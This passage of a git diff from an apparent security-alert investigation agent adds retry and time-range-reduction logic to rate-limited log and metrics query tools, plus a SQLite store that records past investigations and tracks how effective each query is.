_record_query(tool_name: str, kwargs: dict, result_count: int 
| None = None) } _executed_queries.append(query_record) - # Also add to investigation state if available if _current_state: _current_state.executed_queries.append(query_record) -def create_rate_limited_mcp_tool(original_tool: Any) -> Any: +def create_rate_limited_mcp_tool( + original_tool: Any, resilient_executor: QueryResilientExecutor | None = None +) -> Any: """ - Wrap an MCP tool with rate limiting. + Wrap an MCP tool with rate limiting and resilient execution. The wrapper checks the global query counter BEFORE executing. If limit is reached, returns an error message instead of executing. This ensures the LLM sees the limit message even when batching queries. + + Features: + - Rate limiting to prevent query abuse + - Duplicate query detection + - Automatic retry with exponential backoff (via resilient executor) + - Automatic time range reduction on timeout """ - # Get the tool name for checking if it's a query tool tool_name = getattr(original_tool, "name", "") or getattr(original_tool, "__name__", "") # Only wrap query tools if "query_loki" not in tool_name and "query_prometheus" not in tool_name: return original_tool - logger.debug(f"Wrapping MCP tool with rate limiting: {tool_name}") + logger.debug(f"Wrapping MCP tool with rate limiting and resilience: {tool_name}") - # Get the original function to wrap original_fn = getattr(original_tool, "fn", None) if original_fn is None and callable(original_tool): original_fn = original_tool @@ -178,15 +187,15 @@ def create_rate_limited_mcp_tool(original_tool: Any) -> Any: logger.warning(f"Could not find callable for tool {tool_name}, not wrapping") return original_tool + executor = resilient_executor or get_resilient_executor() + @functools.wraps(original_fn) async def rate_limited_wrapper(*args, **kwargs): - # Check limit BEFORE executing error_msg = _check_query_limit() if error_msg: logger.critical(f"🛑 Blocking query tool {tool_name} - limit reached") return error_msg - # Check for duplicate query query_str = 
kwargs.get("logql") or kwargs.get("expr") or "" if query_str: dup_msg = _check_duplicate_query(query_str) @@ -197,18 +206,69 @@ async def rate_limited_wrapper(*args, **kwargs): # Increment counter _increment_query_count(tool_name) - # Execute original + # Extract time parameters for resilient execution + start_time = kwargs.get("startRfc3339") or kwargs.get("start_time") or kwargs.get("start") + end_time = kwargs.get("endRfc3339") or kwargs.get("end_time") or kwargs.get("end") + + # If we have time parameters, use resilient executor + if start_time and end_time and query_str: + logger.info(f"Using resilient executor for {tool_name}") + try: + + async def query_wrapper(logql: str, start_time: str, end_time: str, **kw): + updated_kwargs = {**kwargs} + if "startRfc3339" in kwargs: + updated_kwargs["startRfc3339"] = start_time + updated_kwargs["endRfc3339"] = end_time + elif "start_time" in kwargs: + updated_kwargs["start_time"] = start_time + updated_kwargs["end_time"] = end_time + elif "start" in kwargs: + updated_kwargs["start"] = start_time + updated_kwargs["end"] = end_time + if "logql" in updated_kwargs: + updated_kwargs["logql"] = logql + elif "expr" in updated_kwargs: + updated_kwargs["expr"] = logql + return await original_fn(*args, **updated_kwargs) + + result = await executor.execute_with_resilience( + query_wrapper, + query_str, + start_time, + end_time, + ) + + # Record the query with result count + result_count = _extract_result_count(result) + _record_query(tool_name, kwargs, result_count) + + # Log resilience metadata if present + if isinstance(result, dict) and "_resilience_metadata" in result: + meta = result["_resilience_metadata"] + if meta.get("time_range_reduced"): + logger.info( + f"Query succeeded with reduced time range " + f"({meta.get('time_range_factor', 1.0) * 100:.0f}%)" + ) + if meta.get("retry_count", 0) > 0: + logger.info(f"Query succeeded after {meta['retry_count']} retries") + + return result + + except Exception as e: + 
logger.error(f"Resilient execution failed: {e}") + _record_query(tool_name, kwargs, result_count=0) + return { + "status": "error", + "error": str(e), + "suggestion": "Try a shorter time range or more specific filters.", + } + + # Fallback to original execution without resilience (no time params) try: result = await original_fn(*args, **kwargs) - # Record the query with result count - result_count = None - if isinstance(result, list): - result_count = len(result) - elif isinstance(result, dict) and "results" in result: - result_count = len(result.get("results", [])) - elif isinstance(result, str): - # Try to estimate result count from string response - result_count = result.count("\n") if result else 0 + result_count = _extract_result_count(result) _record_query(tool_name, kwargs, result_count) return result except Exception as e: @@ -223,12 +283,9 @@ async def rate_limited_wrapper(*args, **kwargs): "or add more specific label filters to reduce the query scope." } logger.error(f"Query tool {tool_name} failed: {e}") - # Record failed query _record_query(tool_name, kwargs, result_count=0) raise - # Create a new tool with the wrapped function - # Try to preserve the tool structure for dreadnode SDK if hasattr(original_tool, "fn"): # It's a Tool object with a .fn attribute original_tool.fn = rate_limited_wrapper @@ -238,6 +295,28 @@ async def rate_limited_wrapper(*args, **kwargs): return rate_limited_wrapper +def _extract_result_count(result: Any) -> int | None: + """Extract result count from various result formats.""" + if isinstance(result, list): + return len(result) + if isinstance(result, dict): + if "results" in result: + return len(result.get("results", [])) + if "data" in result: + data = result.get("data", {}) + if isinstance(data, dict) and "result" in data: + streams = data.get("result", []) + if isinstance(streams, list): + total = 0 + for stream in streams: + values = stream.get("values", []) + total += len(values) if isinstance(values, list) else 0 + 
return total + if isinstance(result, str): + return result.count("\n") if result else 0 + return None + + def wrap_mcp_query_tools(mcp_tools: list) -> list: """ Wrap all query-related MCP tools with rate limiting. @@ -384,7 +463,6 @@ def create_investigation_agent( Returns: Configured agent ready to investigate """ - # Set state for query recording set_investigation_state(state) grafana_tools = GrafanaTools( @@ -405,12 +483,11 @@ def create_investigation_agent( completion_tools = CompletionTools() completion_tools.set_state(state) - # Query templates for pre-built attack detection queries - # Uses Grafana URL to derive Loki endpoint (assumes /loki proxy) loki_url = grafana_url.rstrip("/") query_template_tools = QueryTemplateTools(loki_url=loki_url) - # Build tool list + learning_tools = LearningTools() + tools: list = [ grafana_tools, investigation_tools, @@ -418,10 +495,10 @@ def create_investigation_agent( mitre_tools, completion_tools, query_template_tools, + learning_tools, escalate_investigation, ] - # Add Grafana MCP tools if available - with rate limiting on query tools if grafana_mcp_tools: logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent") # Wrap query tools with rate limiting to prevent infinite query loops diff --git a/src/ares/core/persistence.py b/src/ares/core/persistence.py new file mode 100644 index 00000000..2fd0d833 --- /dev/null +++ b/src/ares/core/persistence.py @@ -0,0 +1,843 @@ +""" +Investigation Persistence and Learning System. + +Stores investigation results for learning and provides +similarity-based lookup for new alerts. 
@dataclass
class StoredInvestigation:
    """Snapshot of one finished investigation, as kept in the store."""

    investigation_id: str
    alert_name: str
    alert_fingerprint: str  # Unique identifier for this alert type
    severity: str
    technique_id: str | None
    technique_name: str | None

    # When the investigation ran
    started_at: datetime
    completed_at: datetime
    duration_seconds: float

    # What it concluded
    status: str  # completed, escalated, timeout, failed
    evidence_count: int
    highest_pyramid_level: int
    techniques_identified: list[str]

    # Inputs for later learning
    queries_executed: list[dict]
    query_success_rate: float  # % of queries that returned results
    effective_queries: list[str]  # Queries that produced evidence

    # Analyst verdict, when one has been recorded
    is_true_positive: bool | None = None  # Manual label if available
    analyst_notes: str | None = None

    # Free-form extras
    metadata: dict[str, Any] = field(default_factory=dict)

    def to_dict(self) -> dict[str, Any]:
        """Return the record as a plain dict, with timestamps as ISO-8601 strings."""
        ordered_names = (
            "investigation_id",
            "alert_name",
            "alert_fingerprint",
            "severity",
            "technique_id",
            "technique_name",
            "started_at",
            "completed_at",
            "duration_seconds",
            "status",
            "evidence_count",
            "highest_pyramid_level",
            "techniques_identified",
            "queries_executed",
            "query_success_rate",
            "effective_queries",
            "is_true_positive",
            "analyst_notes",
            "metadata",
        )
        timestamp_names = ("started_at", "completed_at")

        payload: dict[str, Any] = {}
        for name in ordered_names:
            value = getattr(self, name)
            # Only the two timestamps need converting; everything else is
            # passed through by reference.
            payload[name] = value.isoformat() if name in timestamp_names else value
        return payload

    @classmethod
    def from_dict(cls, data: dict[str, Any]) -> StoredInvestigation:
        """Rebuild a record from the mapping produced by ``to_dict``.

        Identity, timing, status and evidence keys are mandatory and raise
        ``KeyError`` when absent; the remaining keys fall back to defaults.
        """
        kwargs: dict[str, Any] = {}

        for key in ("investigation_id", "alert_name", "alert_fingerprint", "severity"):
            kwargs[key] = data[key]
        for key in ("technique_id", "technique_name"):
            kwargs[key] = data.get(key)

        for key in ("started_at", "completed_at"):
            kwargs[key] = datetime.fromisoformat(data[key])
        for key in ("duration_seconds", "status", "evidence_count", "highest_pyramid_level"):
            kwargs[key] = data[key]

        kwargs["techniques_identified"] = data.get("techniques_identified", [])
        kwargs["queries_executed"] = data.get("queries_executed", [])
        kwargs["query_success_rate"] = data.get("query_success_rate", 0.0)
        kwargs["effective_queries"] = data.get("effective_queries", [])
        kwargs["is_true_positive"] = data.get("is_true_positive")
        kwargs["analyst_notes"] = data.get("analyst_notes")
        kwargs["metadata"] = data.get("metadata", {})

        return cls(**kwargs)
StoredInvestigation + similarity_score: float + matching_factors: list[str] + + +class InvestigationStore: + """SQLite-backed storage for investigations. + + Provides: + - Persistence of investigation results + - Query effectiveness tracking + - Similar investigation lookup + - False positive learning + """ + + SCHEMA_VERSION = 1 + + # Table names + TABLE_INVESTIGATIONS = "investigations" + TABLE_QUERY_EFFECTIVENESS = "query_effectiveness" + TABLE_SCHEMA_INFO = "schema_info" + + # Column definitions for investigations table + INVESTIGATIONS_COLUMNS: ClassVar[list[str]] = [ + "investigation_id", + "alert_name", + "alert_fingerprint", + "severity", + "technique_id", + "technique_name", + "started_at", + "completed_at", + "duration_seconds", + "status", + "evidence_count", + "highest_pyramid_level", + "techniques_identified", + "queries_executed", + "query_success_rate", + "effective_queries", + "is_true_positive", + "analyst_notes", + "metadata", + ] + + # Schema SQL + SQL_CREATE_INVESTIGATIONS = """ + CREATE TABLE IF NOT EXISTS investigations ( + investigation_id TEXT PRIMARY KEY, + alert_name TEXT NOT NULL, + alert_fingerprint TEXT NOT NULL, + severity TEXT, + technique_id TEXT, + technique_name TEXT, + started_at TEXT NOT NULL, + completed_at TEXT NOT NULL, + duration_seconds REAL, + status TEXT NOT NULL, + evidence_count INTEGER DEFAULT 0, + highest_pyramid_level INTEGER DEFAULT 0, + techniques_identified TEXT, + queries_executed TEXT, + query_success_rate REAL DEFAULT 0.0, + effective_queries TEXT, + is_true_positive INTEGER, + analyst_notes TEXT, + metadata TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """ + + SQL_CREATE_QUERY_EFFECTIVENESS = """ + CREATE TABLE IF NOT EXISTS query_effectiveness ( + query_pattern TEXT PRIMARY KEY, + total_executions INTEGER DEFAULT 0, + successful_executions INTEGER DEFAULT 0, + evidence_producing INTEGER DEFAULT 0, + alert_types TEXT, + last_used TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """ + + 
SQL_CREATE_SCHEMA_INFO = """ + CREATE TABLE IF NOT EXISTS schema_info ( + key TEXT PRIMARY KEY, + value TEXT + ) + """ + + # Index SQL + SQL_CREATE_INDEXES: ClassVar[list[str]] = [ + "CREATE INDEX IF NOT EXISTS idx_alert_fingerprint ON investigations(alert_fingerprint)", + "CREATE INDEX IF NOT EXISTS idx_technique_id ON investigations(technique_id)", + "CREATE INDEX IF NOT EXISTS idx_alert_name ON investigations(alert_name)", + ] + + # Query SQL templates (columns are hardcoded constants, not user input) + SQL_INSERT_INVESTIGATION = """ + INSERT OR REPLACE INTO investigations ({columns}) + VALUES ({placeholders}) + """.format( # noqa: S608 + columns=", ".join(INVESTIGATIONS_COLUMNS), + placeholders=", ".join("?" * len(INVESTIGATIONS_COLUMNS)), + ) + + SQL_SELECT_INVESTIGATION = "SELECT * FROM investigations WHERE investigation_id = ?" + + SQL_SELECT_RECENT_INVESTIGATIONS = ( + "SELECT * FROM investigations ORDER BY completed_at DESC LIMIT ?" + ) + + SQL_UPDATE_LABEL = """ + UPDATE investigations SET + is_true_positive = ?, + analyst_notes = COALESCE(?, analyst_notes) + WHERE investigation_id = ? + """ + + SQL_SELECT_QUERY_EFFECTIVENESS = "SELECT * FROM query_effectiveness WHERE query_pattern = ?" + + SQL_UPDATE_QUERY_EFFECTIVENESS = """ + UPDATE query_effectiveness SET + total_executions = total_executions + 1, + successful_executions = successful_executions + ?, + evidence_producing = evidence_producing + ?, + alert_types = ?, + last_used = ? + WHERE query_pattern = ? + """ + + SQL_INSERT_QUERY_EFFECTIVENESS = """ + INSERT INTO query_effectiveness ( + query_pattern, total_executions, successful_executions, + evidence_producing, alert_types, last_used + ) VALUES (?, 1, ?, ?, ?, ?) + """ + + SQL_SELECT_EFFECTIVE_QUERIES = """ + SELECT *, + CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0) as evidence_rate + FROM query_effectiveness + WHERE total_executions >= 3 + ORDER BY evidence_rate DESC + LIMIT ? 
+ """ + + SQL_SELECT_FALSE_POSITIVE_PATTERNS = """ + SELECT + alert_name, + alert_fingerprint, + technique_id, + COUNT(*) as occurrences, + AVG(evidence_count) as avg_evidence + FROM investigations + WHERE is_true_positive = 0 + GROUP BY alert_fingerprint + HAVING COUNT(*) >= ? + ORDER BY occurrences DESC + """ + + def __init__(self, db_path: Path | str): + """Initialize the store. + + Args: + db_path: Path to SQLite database file + """ + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_schema() + + @contextmanager + def _get_connection(self) -> Generator[sqlite3.Connection, None, None]: + """Get a database connection.""" + conn = sqlite3.connect(self.db_path) + conn.row_factory = sqlite3.Row + try: + yield conn + finally: + conn.close() + + def _init_schema(self) -> None: + """Initialize database schema.""" + with self._get_connection() as conn: + cursor = conn.cursor() + + cursor.execute(self.SQL_CREATE_INVESTIGATIONS) + cursor.execute(self.SQL_CREATE_QUERY_EFFECTIVENESS) + cursor.execute(self.SQL_CREATE_SCHEMA_INFO) + + for index_sql in self.SQL_CREATE_INDEXES: + cursor.execute(index_sql) + + cursor.execute( + f"INSERT OR REPLACE INTO {self.TABLE_SCHEMA_INFO} (key, value) VALUES (?, ?)", # noqa: S608 + ("version", str(self.SCHEMA_VERSION)), + ) + + conn.commit() + + def _investigation_to_row(self, investigation: StoredInvestigation) -> tuple: + """Convert StoredInvestigation to a tuple for database insertion.""" + return ( + investigation.investigation_id, + investigation.alert_name, + investigation.alert_fingerprint, + investigation.severity, + investigation.technique_id, + investigation.technique_name, + investigation.started_at.isoformat(), + investigation.completed_at.isoformat(), + investigation.duration_seconds, + investigation.status, + investigation.evidence_count, + investigation.highest_pyramid_level, + json.dumps(investigation.techniques_identified), + json.dumps(investigation.queries_executed), + 
investigation.query_success_rate, + json.dumps(investigation.effective_queries), + 1 + if investigation.is_true_positive + else (0 if investigation.is_true_positive is False else None), + investigation.analyst_notes, + json.dumps(investigation.metadata), + ) + + def store_investigation(self, investigation: StoredInvestigation) -> None: + """Store an investigation. + + Args: + investigation: Investigation to store + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_INSERT_INVESTIGATION, self._investigation_to_row(investigation)) + conn.commit() + logger.info(f"Stored investigation {investigation.investigation_id}") + dn.log_metric("investigations_stored", 1, mode="count") + + def get_investigation(self, investigation_id: str) -> StoredInvestigation | None: + """Retrieve an investigation by ID. + + Args: + investigation_id: Investigation ID to retrieve + + Returns: + StoredInvestigation or None if not found + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_INVESTIGATION, (investigation_id,)) + row = cursor.fetchone() + return self._row_to_investigation(row) if row else None + + def find_similar_investigations( + self, + alert_name: str | None = None, + alert_fingerprint: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + limit: int = 10, + ) -> list[SimilarInvestigation]: + """Find similar past investigations. 
+ + Args: + alert_name: Alert name to match + alert_fingerprint: Alert fingerprint to match + technique_id: MITRE technique ID to match + severity: Severity level to match + limit: Maximum number of results + + Returns: + List of SimilarInvestigation objects sorted by similarity + """ + with self._get_connection() as conn: + cursor = conn.cursor() + + conditions = [] + params = [] + + if alert_fingerprint: + conditions.append("alert_fingerprint = ?") + params.append(alert_fingerprint) + + if alert_name: + conditions.append("alert_name = ?") + params.append(alert_name) + + if technique_id: + conditions.append("technique_id = ?") + params.append(technique_id) + + if severity: + conditions.append("severity = ?") + params.append(severity) + + if not conditions: + cursor.execute(self.SQL_SELECT_RECENT_INVESTIGATIONS, (limit,)) + else: + where_clause = " OR ".join(conditions) + query = f"SELECT * FROM investigations WHERE {where_clause} ORDER BY completed_at DESC LIMIT ?" # noqa: S608 # nosec B608 + cursor.execute(query, (*params, limit * 2)) # nosec B608 + + rows = cursor.fetchall() + + similar = [] + for row in rows: + investigation = self._row_to_investigation(row) + score, factors = self._calculate_similarity( + investigation, + alert_name=alert_name, + alert_fingerprint=alert_fingerprint, + technique_id=technique_id, + severity=severity, + ) + if score > 0: + similar.append( + SimilarInvestigation( + investigation=investigation, + similarity_score=score, + matching_factors=factors, + ) + ) + + similar.sort(key=lambda x: x.similarity_score, reverse=True) + return similar[:limit] + + def _calculate_similarity( + self, + investigation: StoredInvestigation, + alert_name: str | None = None, + alert_fingerprint: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + ) -> tuple[float, list[str]]: + """Calculate similarity score for an investigation. 
+ + Returns: + Tuple of (score, list of matching factors) + """ + score = 0.0 + factors = [] + + # Fingerprint match is highest weight (same alert type) + if alert_fingerprint and investigation.alert_fingerprint == alert_fingerprint: + score += 0.5 + factors.append("same_alert_fingerprint") + + # Alert name match + if alert_name and investigation.alert_name == alert_name: + score += 0.3 + factors.append("same_alert_name") + + # Technique match + if technique_id and investigation.technique_id == technique_id: + score += 0.15 + factors.append("same_technique") + + # Severity match + if severity and investigation.severity == severity: + score += 0.05 + factors.append("same_severity") + + return score, factors + + def _row_to_investigation(self, row: sqlite3.Row) -> StoredInvestigation: + """Convert a database row to StoredInvestigation.""" + return StoredInvestigation( + investigation_id=row["investigation_id"], + alert_name=row["alert_name"], + alert_fingerprint=row["alert_fingerprint"], + severity=row["severity"], + technique_id=row["technique_id"], + technique_name=row["technique_name"], + started_at=datetime.fromisoformat(row["started_at"]), + completed_at=datetime.fromisoformat(row["completed_at"]), + duration_seconds=row["duration_seconds"], + status=row["status"], + evidence_count=row["evidence_count"], + highest_pyramid_level=row["highest_pyramid_level"], + techniques_identified=json.loads(row["techniques_identified"] or "[]"), + queries_executed=json.loads(row["queries_executed"] or "[]"), + query_success_rate=row["query_success_rate"], + effective_queries=json.loads(row["effective_queries"] or "[]"), + is_true_positive=None + if row["is_true_positive"] is None + else bool(row["is_true_positive"]), + analyst_notes=row["analyst_notes"], + metadata=json.loads(row["metadata"] or "{}"), + ) + + def update_query_effectiveness( + self, + query_pattern: str, + successful: bool, + produced_evidence: bool, + alert_type: str, + ) -> None: + """Update query 
effectiveness statistics. + + Args: + query_pattern: Normalized query pattern + successful: Whether query returned results + produced_evidence: Whether query led to recorded evidence + alert_type: Alert name where query was used + """ + with self._get_connection() as conn: + cursor = conn.cursor() + now = datetime.now(timezone.utc).isoformat() + + cursor.execute(self.SQL_SELECT_QUERY_EFFECTIVENESS, (query_pattern,)) + row = cursor.fetchone() + + if row: + alert_types = json.loads(row["alert_types"] or "[]") + if alert_type not in alert_types: + alert_types.append(alert_type) + + cursor.execute( + self.SQL_UPDATE_QUERY_EFFECTIVENESS, + ( + 1 if successful else 0, + 1 if produced_evidence else 0, + json.dumps(alert_types), + now, + query_pattern, + ), + ) + else: + cursor.execute( + self.SQL_INSERT_QUERY_EFFECTIVENESS, + ( + query_pattern, + 1 if successful else 0, + 1 if produced_evidence else 0, + json.dumps([alert_type]), + now, + ), + ) + + conn.commit() + + def get_effective_queries( + self, + alert_type: str | None = None, + min_evidence_rate: float = 0.3, + limit: int = 20, + ) -> list[QueryEffectiveness]: + """Get most effective queries. 
+ + Args: + alert_type: Filter by alert type + min_evidence_rate: Minimum evidence production rate + limit: Maximum results + + Returns: + List of QueryEffectiveness objects + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_EFFECTIVE_QUERIES, (limit * 2,)) + + results = [] + for row in cursor.fetchall(): + alert_types = json.loads(row["alert_types"] or "[]") + + if alert_type and alert_type not in alert_types: + continue + + qe = QueryEffectiveness( + query_pattern=row["query_pattern"], + total_executions=row["total_executions"], + successful_executions=row["successful_executions"], + evidence_producing=row["evidence_producing"], + alert_types=alert_types, + ) + + if qe.evidence_rate >= min_evidence_rate: + results.append(qe) + + if len(results) >= limit: + break + + return results + + def get_statistics(self) -> dict[str, Any]: + """Get overall statistics. + + Returns: + Dictionary with statistics + """ + with self._get_connection() as conn: + cursor = conn.cursor() + + # Investigation stats + cursor.execute("SELECT COUNT(*) as total FROM investigations") + total_investigations = cursor.fetchone()["total"] + + cursor.execute("SELECT status, COUNT(*) as count FROM investigations GROUP BY status") + status_counts = {row["status"]: row["count"] for row in cursor.fetchall()} + + cursor.execute("SELECT AVG(evidence_count) as avg_evidence FROM investigations") + avg_evidence = cursor.fetchone()["avg_evidence"] or 0 + + cursor.execute("SELECT AVG(highest_pyramid_level) as avg_pyramid FROM investigations") + avg_pyramid = cursor.fetchone()["avg_pyramid"] or 0 + + cursor.execute("SELECT AVG(duration_seconds) as avg_duration FROM investigations") + avg_duration = cursor.fetchone()["avg_duration"] or 0 + + # Query stats + cursor.execute("SELECT COUNT(*) as total FROM query_effectiveness") + total_queries = cursor.fetchone()["total"] + + cursor.execute( + """ + SELECT AVG(CAST(evidence_producing AS REAL) / 
NULLIF(total_executions, 0)) + as avg_evidence_rate FROM query_effectiveness + WHERE total_executions >= 3 + """ + ) + avg_query_evidence_rate = cursor.fetchone()["avg_evidence_rate"] or 0 + + # True positive rate (if labeled) + cursor.execute( + """ + SELECT + COUNT(CASE WHEN is_true_positive = 1 THEN 1 END) as true_positives, + COUNT(CASE WHEN is_true_positive = 0 THEN 1 END) as false_positives, + COUNT(CASE WHEN is_true_positive IS NOT NULL THEN 1 END) as labeled + FROM investigations + """ + ) + tp_row = cursor.fetchone() + true_positives = tp_row["true_positives"] + false_positives = tp_row["false_positives"] + labeled = tp_row["labeled"] + + tp_rate = true_positives / labeled if labeled > 0 else None + + return { + "total_investigations": total_investigations, + "status_distribution": status_counts, + "avg_evidence_count": round(avg_evidence, 1), + "avg_pyramid_level": round(avg_pyramid, 1), + "avg_duration_seconds": round(avg_duration, 1), + "total_query_patterns": total_queries, + "avg_query_evidence_rate": round(avg_query_evidence_rate * 100, 1) + if avg_query_evidence_rate + else 0, + "labeling": { + "true_positives": true_positives, + "false_positives": false_positives, + "unlabeled": total_investigations - labeled, + "true_positive_rate": round(tp_rate * 100, 1) if tp_rate is not None else None, + }, + } + + def label_investigation( + self, + investigation_id: str, + is_true_positive: bool, + analyst_notes: str | None = None, + ) -> bool: + """Label an investigation as true/false positive. 
+ + Args: + investigation_id: Investigation to label + is_true_positive: Whether it was a true positive + analyst_notes: Optional analyst notes + + Returns: + True if updated, False if investigation not found + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute( + self.SQL_UPDATE_LABEL, + (1 if is_true_positive else 0, analyst_notes, investigation_id), + ) + conn.commit() + + if cursor.rowcount > 0: + logger.info( + f"Labeled investigation {investigation_id} as " + f"{'true' if is_true_positive else 'false'} positive" + ) + return True + return False + + def get_false_positive_patterns(self, min_occurrences: int = 3) -> list[dict[str, Any]]: + """Get patterns from known false positives. + + Args: + min_occurrences: Minimum occurrences to consider a pattern + + Returns: + List of false positive patterns + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_FALSE_POSITIVE_PATTERNS, (min_occurrences,)) + + return [ + { + "alert_name": row["alert_name"], + "fingerprint": row["alert_fingerprint"], + "technique_id": row["technique_id"], + "occurrences": row["occurrences"], + "avg_evidence": round(row["avg_evidence"], 1), + "recommendation": "Consider tuning this alert rule", + } + for row in cursor.fetchall() + ] + + +def create_stored_investigation_from_state( + state: InvestigationState, + status: str, +) -> StoredInvestigation: + """Create a StoredInvestigation from InvestigationState. 
+ + Args: + state: Investigation state object + status: Final status (completed, escalated, timeout, failed) + + Returns: + StoredInvestigation ready for persistence + """ + + now = datetime.now(timezone.utc) + + # Generate alert fingerprint from labels + labels = state.alert.get("labels", {}) + fingerprint = labels.get("__alert_rule_uid__") or labels.get("alertname", "unknown") + + queries = state.executed_queries + if queries: + successful = sum(1 for q in queries if q.get("result_count", 0) > 0) + query_success_rate = successful / len(queries) + else: + query_success_rate = 0.0 + + effective_queries = [ + q.get("query", "") for q in queries if q.get("result_count", 0) > 0 and q.get("query") + ] + + technique_id = None + technique_name = None + if state.identified_techniques: + technique_id = next(iter(state.identified_techniques)) + technique_name = state.technique_names.get(technique_id) + + return StoredInvestigation( + investigation_id=state.investigation_id, + alert_name=labels.get("alertname", "unknown"), + alert_fingerprint=fingerprint, + severity=labels.get("severity", "unknown"), + technique_id=technique_id, + technique_name=technique_name, + started_at=state.started_at, + completed_at=now, + duration_seconds=(now - state.started_at).total_seconds(), + status=status, + evidence_count=len(state.evidence), + highest_pyramid_level=state.highest_pyramid_level, + techniques_identified=list(state.identified_techniques), + queries_executed=queries, + query_success_rate=query_success_rate, + effective_queries=effective_queries, + metadata={ + "escalated": state.escalated, + "escalation_reason": state.escalation_reason, + "hosts_investigated": list(state.queried_hosts), + "users_investigated": list(state.queried_users), + }, + ) + + +# Global store instance +_store: InvestigationStore | None = None + + +def get_investigation_store(db_path: Path | str | None = None) -> InvestigationStore: + """Get or create the global investigation store. 
+ + Args: + db_path: Path to database file (default: ~/.ares/investigations.db) + + Returns: + InvestigationStore instance + """ + global _store + + if _store is None: + if db_path is None: + db_path = Path.home() / ".ares" / "investigations.db" + _store = InvestigationStore(db_path) + + return _store + + +def reset_investigation_store() -> None: + """Reset the global store (for testing).""" + global _store + _store = None diff --git a/src/ares/core/query_resilience.py b/src/ares/core/query_resilience.py new file mode 100644 index 00000000..32944b99 --- /dev/null +++ b/src/ares/core/query_resilience.py @@ -0,0 +1,402 @@ +""" +Query resilience module for handling timeouts and retries. + +Provides automatic time range reduction, retry with backoff, +and query chunking for large time ranges. +""" + +import asyncio +from collections.abc import Callable +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from typing import Any, ClassVar + +import dreadnode as dn +from loguru import logger + + +@dataclass +class QueryAttempt: + """Record of a query attempt.""" + + query: str + start_time: str + end_time: str + attempt_number: int + success: bool + error: str | None = None + result_count: int = 0 + duration_ms: int = 0 + + +@dataclass +class QueryStats: + """Statistics for query execution.""" + + total_attempts: int = 0 + successful_attempts: int = 0 + timeout_count: int = 0 + retry_count: int = 0 + time_range_reductions: int = 0 + attempts: list[QueryAttempt] = field(default_factory=list) + + @property + def success_rate(self) -> float: + if self.total_attempts == 0: + return 0.0 + return self.successful_attempts / self.total_attempts + + +class QueryResilientExecutor: + """Executes queries with automatic retry and time range reduction. 
+ + Features: + - Automatic time range reduction on timeout + - Exponential backoff for retries + - Query chunking for large time ranges + - Statistics tracking for monitoring + """ + + TIME_RANGE_FACTORS: ClassVar[list[float]] = [1.0, 0.5, 0.25, 0.1] + BACKOFF_DELAYS: ClassVar[list[int]] = [1, 2, 4] + + def __init__( + self, + max_retries: int = 3, + initial_timeout: float = 30.0, + enable_chunking: bool = True, + chunk_size_minutes: int = 30, + ): + """Initialize the resilient executor. + + Args: + max_retries: Maximum number of retry attempts + initial_timeout: Initial timeout in seconds + enable_chunking: Whether to enable query chunking for large ranges + chunk_size_minutes: Size of each chunk in minutes + """ + self.max_retries = max_retries + self.initial_timeout = initial_timeout + self.enable_chunking = enable_chunking + self.chunk_size_minutes = chunk_size_minutes + self.stats = QueryStats() + + async def execute_with_resilience( + self, + query_fn: Callable[..., Any], + query: str, + start_time: str, + end_time: str, + **kwargs: Any, + ) -> dict[str, Any]: + """Execute a query with automatic retry and time range reduction. 
+ + Args: + query_fn: The async query function to call + query: The query string (LogQL or PromQL) + start_time: ISO8601 start timestamp + end_time: ISO8601 end timestamp + **kwargs: Additional arguments for the query function + + Returns: + Query result dict with additional metadata about retries + """ + start_dt = datetime.fromisoformat(start_time.replace("Z", "+00:00")) + end_dt = datetime.fromisoformat(end_time.replace("Z", "+00:00")) + original_range = end_dt - start_dt + + if self.enable_chunking and original_range > timedelta(hours=2): + logger.info(f"Query range ({original_range}) exceeds 2h, using chunked execution") + return await self._execute_chunked(query_fn, query, start_dt, end_dt, **kwargs) + + # Try with progressively smaller time ranges + last_error = None + for _factor_idx, factor in enumerate(self.TIME_RANGE_FACTORS): + if factor < 1.0: + self.stats.time_range_reductions += 1 + + # Calculate reduced time range (centered on end time since recent data is usually more relevant) + reduced_range = original_range * factor + new_start = end_dt - reduced_range + new_start_str = new_start.isoformat().replace("+00:00", "Z") + new_end_str = end_dt.isoformat().replace("+00:00", "Z") + + if factor < 1.0: + logger.info( + f"Reducing time range to {factor * 100:.0f}% ({reduced_range}) for retry" + ) + + # Try with retries at this time range + for attempt in range(self.max_retries): + self.stats.total_attempts += 1 + attempt_start = datetime.now(timezone.utc) + + try: + if attempt > 0: + self.stats.retry_count += 1 + delay = self.BACKOFF_DELAYS[min(attempt - 1, len(self.BACKOFF_DELAYS) - 1)] + logger.info( + f"Retry attempt {attempt + 1}/{self.max_retries} after {delay}s backoff" + ) + await asyncio.sleep(delay) + + # Execute the query with timeout + timeout = self.initial_timeout * ( + 1 + attempt * 0.5 + ) # Increase timeout on retries + result = await asyncio.wait_for( + query_fn( + logql=query, + start_time=new_start_str, + end_time=new_end_str, + **kwargs, 
